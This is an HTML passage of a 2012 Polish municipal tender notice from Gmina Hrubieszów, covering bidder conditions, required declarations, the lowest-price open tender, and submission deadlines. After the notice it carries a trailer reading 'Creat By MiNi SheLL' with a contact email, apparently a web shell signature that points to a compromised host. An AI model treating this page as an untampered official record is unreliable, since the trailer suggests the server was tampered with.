wykonawca przedłoży do oferty oświadczenie o spełnieniu warunków udziału w
postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych
warunków zamówienia - pkt 1 oświadczenia) wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia;
tj. wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) zrealizowali co najmniej jedną dostawę odpowiadającą swoim rodzajem przedmiotowi zamówienia, podobnym
charakterze i posiadają dokument, potwierdzający, że dostawa/y zostały wykonane lub są wykonywane należycie;
 Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli
wykonawca przedłoży do oferty oświadczenie o spełnieniu warunków udziału w
postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych
warunków zamówienia - pkt 2 oświadczenia) i dokumentu (wykazu
wykonanych lub wykonywanych dostaw - wypełniony załącznik nr 4 siwz),
który zawierał będzie co najmniej jedną dostawę, spełniającą powyższe kryteria
oraz dokumentu potwierdzającego, że dostawy wykonane lub są wykonywane
należycie - wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym;
Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli
wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w
postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych
warunków zamówienia - pkt 3 oświadczenia) - wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania osobami zdolnymi do wykonania zamówienia;
Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli
wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w
postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych
warunków zamówienia - pkt 3 oświadczenia) - wg zasady spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej;
Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli
wykonawca załączy do oferty oświadczenie o spełnieniu warunków udziału w
postępowaniu (wzór oświadczenia stanowi zał. nr 2 specyfikacji istotnych
warunków zamówienia - pkt 4 oświadczenia) - wg zasady spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień umowy w stosunku do treści oferty, na
podstawie której dokonano wyboru wykonawcy wyłącznie w sytuacji gdy wprowadzenie
tych zmian wynika z okoliczności, których nie można było przewidzieć w chwili
zawierania umowy lub zmiany te są nieistotne albo korzystne dla zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.hrubieszow-gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Hrubieszów
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 14:00, miejsce: Urząd Gminy Hrubieszów
ul. B. Prusa 8
22-500 Hrubieszów
pokój nr 15 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Realizowany projekt współfinansowany jest ze środków Unii Europejskiej z Europejskiego
Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com